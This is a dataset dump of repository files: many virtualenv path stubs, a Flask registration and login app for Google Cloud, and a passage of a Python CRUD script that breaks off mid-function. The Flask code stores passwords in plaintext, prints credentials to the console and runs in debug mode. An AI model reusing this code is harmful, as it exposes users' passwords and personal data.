"text": "/Users/bhavana/anaconda3/lib/python3.6/operator.py"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.8297872543334961,
"avg_line_length": 47,
"blob_id": "500e46ada6b6931bc5beb05dcfc6eca37e1a15bd",
"content_id": "3bea41fce2ffa12ebae3819acfce310cb29ef2e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 47,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 1,
"path": "/env/lib/python3.6/types.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/types.py"
},
{
"alpha_fraction": 0.7758620977401733,
"alphanum_fraction": 0.8275862336158752,
"avg_line_length": 58,
"blob_id": "021d28e49fd13cca121090f8b6f30b4d137ebb2e",
"content_id": "54aa43abc6b3b011f20dc25212cbe8ef9ddbe8f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 1,
"path": "/env/lib/python3.6/_collections_abc.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/_collections_abc.py"
},
{
"alpha_fraction": 0.6313537955284119,
"alphanum_fraction": 0.6439355611801147,
"avg_line_length": 30.79199981689453,
"blob_id": "03f3557cd71799bf0525d41445169b23e28a04ab",
"content_id": "2eaa4257f8e222b758feace56ab36c2b93649166",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3974,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 125,
"path": "/main.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "import datetime\nimport logging\nimport os\nimport socket\n\nfrom flask import Flask, request, render_template, redirect, url_for, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nimport sqlalchemy\nimport json\n\napp = Flask(__name__)\n\n\ndef is_ipv6(addr):\n \"\"\"Checks if a given address is an IPv6 address.\"\"\"\n try:\n socket.inet_pton(socket.AF_INET6, addr)\n return True\n except socket.error:\n return False\n\n\n# [START example]\n# Environment variables are defined in app.yaml.\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ['SQLALCHEMY_DATABASE_URI']\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\n\nclass User(db.Model):\n email = db.Column(db.String(50), primary_key = True)\n password = db.Column(db.String(50))\n\nclass Details(db.Model):\n first = db.Column(db.String(50))\n last = db.Column(db.String(50))\n address = db.Column(db.String(200))\n phone = db.Column(db.String(10), primary_key = True)\n desc = db.Column(db.String(500))\n salary = db.Column(db.String(50))\n sign = db.Column(db.LargeBinary())\n\[email protected]('/')\ndef index():\n error = request.args.get('error')\n message = request.args.get('message')\n return render_template('index.html', error = error, message = message )\n\[email protected]('/register',methods=['POST']) \ndef register():\n #username = request.form['name']\n #password = request.form['password']\n #email = request.form['email']\n user = request.get_json()\n username = user[\"data\"][\"email\"]\n password = user[\"data\"][\"password\"]\n print(username)\n print(password)\n user = User(password = password, email = username)\n db.session.add(user)\n db.session.commit()\n return json.dumps({'error':False}), 200, {'ContentType':'application/json'}\n #return render_template('index.html', message = \"Succesfully registered. 
Please login to continue!\")\n\[email protected]('/login',methods=['POST']) \ndef login():\n # read the posted values from the UI\n user = request.get_json()\n username = user[\"data\"][\"email\"]\n password = user[\"data\"][\"password\"]\n print(username)\n print(password)\n user =User.query.filter_by(email = username, password = password).first()\n if user :\n return json.dumps({'error':False}), 200, {'ContentType':'application/json'}\n else:\n return json.dumps({'error':True}), 500, {'ContentType':'application/json'} \n\n\[email protected]('/welcome.html')\ndef handler():\n message = request.args.get('message') \n if message:\n return render_template('welcome.html', message = message) \n else:\n return render_template('welcome.html')\n\n\[email protected]('/process')\ndef process():\n submission = request.args.get('submission')\n return render_template('process.html', submission = submission) \n \[email protected]('/desc',methods=['POST']) \ndef userdetails():\n # read the posted values from the UI\n user = request.get_json()\n first = user[\"data\"][\"firstName\"]\n last = user[\"data\"][\"lastName\"]\n phone = user[\"data\"][\"phonenumber\"]\n salary = user[\"data\"][\"salary\"]\n desc = user[\"data\"][\"description\"]\n address = user[\"data\"][\"address\"]\n sign = user[\"data\"][\"signature\"]\n\n details = Details(first = first, last = last, phone = phone, salary = salary, \n desc = desc , address = address, sign = bytes(sign,encoding = 'utf-8'))\n db.session.add(details)\n db.session.commit()\n return json.dumps({'error':False}), 200, {'ContentType':'application/json'}\n \[email protected](500)\ndef server_error(e):\n logging.exception('An error occurred during a request.')\n return \"\"\"\n An internal error occurred: <pre>{}</pre>\n See logs for full stacktrace.\n \"\"\".format(e), 500\n\n\nif __name__ == '__main__':\n # This is used when running locally. Gunicorn is used to run the\n # application on Google App Engine. See entrypoint in app.yaml.\n app.run(host='127.0.0.1', port=8080, debug=True)\n"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "c39beadeacd13caf8adb2f326a70dfaf7cf006fd",
"content_id": "b644a7359a9c896f1790ede495cc31ac8bfd6fd9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/locale.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/locale.py"
},
{
"alpha_fraction": 0.7924528121948242,
"alphanum_fraction": 0.849056601524353,
"avg_line_length": 53,
"blob_id": "52ea078474cb23b4a8d4ee25870b86fa5c325b9f",
"content_id": "5a1cef6751a0007b8959ffcbd69fcfb6bc957507",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/genericpath.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/genericpath.py"
},
{
"alpha_fraction": 0.7555555701255798,
"alphanum_fraction": 0.8222222328186035,
"avg_line_length": 45,
"blob_id": "58b4c8705a633f2212b8002039b001b81c52b5b0",
"content_id": "6af4e5ac498ca2824d81666d52f96b5e0720815f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 1,
"path": "/env/lib/python3.6/imp.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/imp.py"
},
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.8301886916160583,
"avg_line_length": 53,
"blob_id": "170217831764e8c95afbea2b1c64db0749aa1c5a",
"content_id": "fbcdbf83eced23c9385a2efe0ab8d6d5f0fa3da5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/sre_compile.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/sre_compile.py"
},
{
"alpha_fraction": 0.7843137383460999,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 51,
"blob_id": "c1f3d5ffe0655a3114ea73c5a582a9b927b20bf1",
"content_id": "817e61fc011f9af0c8991b07ee225f54a88f1943",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 1,
"path": "/env/lib/python3.6/posixpath.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/posixpath.py"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 46,
"blob_id": "596c11832abebec9ae42489e6775d93dde78ddff",
"content_id": "b445f363983d97e73371cc52550cc6aec1daccbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 1,
"path": "/env/lib/python3.6/hmac.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/hmac.py"
},
{
"alpha_fraction": 0.7799999713897705,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 50,
"blob_id": "7d90bec230ce4e2f178d53cb35de72a6178932df",
"content_id": "bc6423bdd67bbe88faabaffb3269767c9d0f64fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 1,
"path": "/env/lib/python3.6/warnings.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/warnings.py"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 44,
"blob_id": "ecfeefa038016682d3fe2023cedb636552f7c589",
"content_id": "229463dde9cc0faf7ee6ffc598ed32c6db8c6a50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 44,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 1,
"path": "/env/lib/python3.6/os.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/os.py"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 46,
"blob_id": "168d5d30efe8a50fafb2ba84b0cf8b6292702bbf",
"content_id": "ef7b26c2d4310b64c485e99f5c57d4ee7c2c444d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 1,
"path": "/env/lib/python3.6/copy.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/copy.py"
},
{
"alpha_fraction": 0.7755101919174194,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 49,
"blob_id": "4a9031b12cf6d66e0db6ca956a1eaa44eec914b2",
"content_id": "d7b8c8a6c637819ec711f2ca7379e6f4d4b66742",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 1,
"path": "/env/lib/python3.6/copyreg.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/copyreg.py"
},
{
"alpha_fraction": 0.7843137383460999,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 51,
"blob_id": "ad8cdab4e0c4b5b560fd2af0e2c3529ef7334e4c",
"content_id": "28c562db70489585047610d51a9b84f9e4d67c0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 1,
"path": "/env/lib/python3.6/functools.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/functools.py"
},
{
"alpha_fraction": 0.7818182110786438,
"alphanum_fraction": 0.8363636136054993,
"avg_line_length": 55,
"blob_id": "8748eb49788573e8d197dd839a877a545b14eeef",
"content_id": "09a270f37bbc884ff9eacaa0a4fb55b7a7162afb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 1,
"path": "/env/lib/python3.6/sre_constants.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/sre_constants.py"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.8297872543334961,
"avg_line_length": 47,
"blob_id": "daf9a9f0a286a59a82c209bc78fa75255e70f4c9",
"content_id": "7fb31b6cb25bffb99cf544e1172faac843f9c754",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 47,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 1,
"path": "/env/lib/python3.6/token.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/token.py"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 44,
"blob_id": "f78387ac265fb9f5f467b7eff302a0e7dfecdac1",
"content_id": "65be6392aef5b2aaeea5f5063138cf394e8356d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 44,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 1,
"path": "/env/lib/python3.6/re.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/re.py"
},
{
"alpha_fraction": 0.7636363506317139,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 55,
"blob_id": "707470fb478665590ca7609e5da09e98152b2603",
"content_id": "00d2ffd27ec5fc7aa0d57c73b02e1f5ace69cdbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 1,
"path": "/env/lib/python3.6/_dummy_thread.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/_dummy_thread.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "99a15e61161ac10402ffbfa891d9ce99797b2138",
"content_id": "e6a8d8dbb872abd0d89df672ea5e36b89b48b098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/shutil.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/shutil.py"
},
{
"alpha_fraction": 0.7755101919174194,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 49,
"blob_id": "c0ceeb6a7ea2472f61bb4deb971e083835411889",
"content_id": "0b8342dfa248427910dc087fcfeb4ef4696fb893",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 1,
"path": "/env/lib/python3.6/keyword.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/keyword.py"
},
{
"alpha_fraction": 0.7843137383460999,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 51,
"blob_id": "75d0d3e8a72ea990f249fdea06f9814663ec457c",
"content_id": "4def4c29125292956d6114f51347ce9c8ab738c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 1,
"path": "/env/lib/python3.6/linecache.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/linecache.py"
},
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.8301886916160583,
"avg_line_length": 53,
"blob_id": "6fff2c7c6a3d3b5fa9b57a985fc81ef02210a281",
"content_id": "a40cefca22e844e54c758cb6ec6eae238d2a9255",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/_weakrefset.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/_weakrefset.py"
},
{
"alpha_fraction": 0.7115384340286255,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 52,
"blob_id": "bd92038f49bc49c3ee82ec679cda3d6036f753a3",
"content_id": "768f3128c9b47fd54329cf8ddc675724aeac7105",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 1,
"path": "/env/lib/python3.6/__future__.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/__future__.py"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 44,
"blob_id": "a77d9f011054bb318e8d48e1030eca5492abf220",
"content_id": "88d28dc171737835affbf6c125f63e5feb1e8eeb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 44,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 1,
"path": "/env/lib/python3.6/io.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/io.py"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.8235294222831726,
"avg_line_length": 51,
"blob_id": "5aa16f19c51b284156b1712cb72f46810e245e4f",
"content_id": "897f8e21991641c97ef90e76b4a3f6fc9a21b65a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 1,
"path": "/env/lib/python3.6/sre_parse.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/sre_parse.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "47cf3053db432a8f553d9f1630e55b3c3ec0f306",
"content_id": "a45f809dd37006f5610fdbccef9b247035840c2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/bisect.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/bisect.py"
},
{
"alpha_fraction": 0.7291666865348816,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "44e34cc0d0d2bf35d847aa3c056dc25535a1ffc9",
"content_id": "7e59a702681543941b33592191f0a29b2e23efe3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/base64.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/base64.py"
},
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.8301886916160583,
"avg_line_length": 53,
"blob_id": "c0c566d8463a93d9f51ae14cc1f24894fa5075f6",
"content_id": "ce4213c1be984d201fa250f7ed77158accca50fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/_bootlocale.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/_bootlocale.py"
},
{
"alpha_fraction": 0.7755101919174194,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 49,
"blob_id": "ef0d2d2e20b9b3b83209898e6f09bd9938b5a13c",
"content_id": "a490087e656bd7369926ced0d59479af46d8dd06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 1,
"path": "/env/lib/python3.6/tarfile.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/tarfile.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "2b1326a99bf523c207728db68fe2dedaed1542c9",
"content_id": "d5c266c031acbb3d45471a0e2baab5a3ec30e173",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/ntpath.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/ntpath.py"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 46,
"blob_id": "4389616a26f6107dee8efdce6d7459c3ba00531e",
"content_id": "032a07a627aae0b275890e8f45242b4dc879881b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 1,
"path": "/env/lib/python3.6/stat.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/stat.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "5a6d518158414eee0ecdd70b7810d9332c1b25b9",
"content_id": "5f221fa4a0f4c4292d9b3370c7445b3789cc66ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/struct.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/struct.py"
},
{
"alpha_fraction": 0.7555555701255798,
"alphanum_fraction": 0.8222222328186035,
"avg_line_length": 45,
"blob_id": "ecb9ca3195d1d21f4b7847666af5d3ca97e86a7c",
"content_id": "ad5ef1f41279dcc5c5cbde14f844ee1585074ad8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 1,
"path": "/env/lib/python3.6/abc.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/abc.py"
},
{
"alpha_fraction": 0.7924528121948242,
"alphanum_fraction": 0.849056601524353,
"avg_line_length": 53,
"blob_id": "65d638ea1b50e25e6eaab61ece8dfbc3df82ec73",
"content_id": "2d55b8ab106e62f3fbf5d1de2463b4e1884f9d6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/rlcompleter.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/rlcompleter.py"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 46,
"blob_id": "bd630e163c907bfdec5b80f4230255678c62a479",
"content_id": "625e755d9af5a9dff2050a37680b37b089e4212d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 1,
"path": "/env/lib/python3.6/enum.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/enum.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "3c66c0d12e0f6d2289d2bbab18adfb49cc458529",
"content_id": "71a38f8d117fb474eea7955a19a03c1144002430",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/random.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/random.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "ad67e9a00ffb05b39d73b20512aea80e75013a78",
"content_id": "27e4f8e69f25556a1d0b8b593e254e987138aa7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/codecs.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/codecs.py"
},
{
"alpha_fraction": 0.7755101919174194,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 49,
"blob_id": "136a74884d1d99318d0609965189ac104c310464",
"content_id": "712f2333993e42b56a60097ddca406e006fb682f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 1,
"path": "/env/lib/python3.6/fnmatch.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/fnmatch.py"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.8297872543334961,
"avg_line_length": 47,
"blob_id": "606a7244ae169ad5fc417cc93c8bce01945a811e",
"content_id": "c91eb69c425c07d6253ddbb68c4d79925e8d8189",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 47,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 1,
"path": "/env/lib/python3.6/heapq.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/heapq.py"
}
] | 42 |
j-luis996/crud_python-dic | https://github.com/j-luis996/crud_python-dic | 6729ba555e03a7ba5f06c2468284bb24b6ab01b5 | d7274f14d37d9ecc76842daa2c6d2ff8b17eb6d0 | fca0e7a39a441567b57baf019737bd9fd77e2993 | refs/heads/main | 2023-06-08T22:53:37.814038 | 2021-07-06T07:34:41 | 2021-07-06T07:34:41 | 383,322,584 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8032786846160889,
"alphanum_fraction": 0.8032786846160889,
"avg_line_length": 29.5,
"blob_id": "fbfc82d1552d2e8c24672350fdbb36210e776209",
"content_id": "7dcf3d8f764a4e1a9675a416e7997d7d2d8a34a3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 61,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 2,
"path": "/README.md",
"repo_name": "j-luis996/crud_python-dic",
"src_encoding": "UTF-8",
"text": "# crud_python-dic\ncrud in python with dictionaries and lists\n"
},
{
"alpha_fraction": 0.5391342639923096,
"alphanum_fraction": 0.5400087237358093,
"avg_line_length": 29.50666618347168,
"blob_id": "298e512e35a9b878e8fdd77be3e9e37e3d6346f1",
"content_id": "60e8c6bc4eb1289c3ee11bc1a2ff5ea073eaeaf8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2287,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 75,
"path": "/crud.py",
"repo_name": "j-luis996/crud_python-dic",
"src_encoding": "UTF-8",
"text": "from ej import search_client\nimport const\n\nclass crud:\n def __get_client_field(self, field_name, message = \"What's the client {}? \"):\n field = None\n\n while not field:\n field = input(message.format(field_name))\n return field\n\n\n def __get_client_from_user(self):\n client = {\n 'name': self.__get_client_field(field_name = 'name'),\n 'company': self.__get_client_field(field_name = 'company'),\n 'email': self.__get_client_field(field_name = 'email'),\n 'position': self.__get_client_field(field_name = 'position'),\n }\n\n return client\n\n\n def __add_client(self, client):\n if client in const.clients:\n print(\"Client alredy in client's list\")\n else:\n const.clients.append(client)\n\n\n def create_client(self):\n client = self.__get_client_from_user()\n self.__add_client(client)\n print('Added client successful')\n\n\n def read_clients(self):\n print('uid | name | company | email | position')\n print('*' * 50)\n\n for idx, client in enumerate(const.clients):\n print(f'{idx} | {client[\"name\"]} | {client[\"company\"]} | {client[\"email\"]} | {client[\"position\"]}')\n\n\n def update_client(self):\n id_client = int(self.__get_client_field(field_name=\"id\"))\n if id_client < len(const.clients):\n client_update = self.__get_client_from_user()\n const.clients[id_client] = client_update\n print(\"Client updated in client's list\")\n else:\n print('id invalid')\n\n\n def delete_client(self):\n id_client = int(self.__get_client_field(field_name=\"id\"))\n if id_client < len(const.clients):\n for idx, client in enumerate(const.clients):\n if idx == id_client:\n del const.clients[idx] \n break\n print(\"Client deleted in client's list\")\n else:\n print('id invalid')\n\n\n def search_client(self, data, key = \"name\"):\n client_exist = False\n 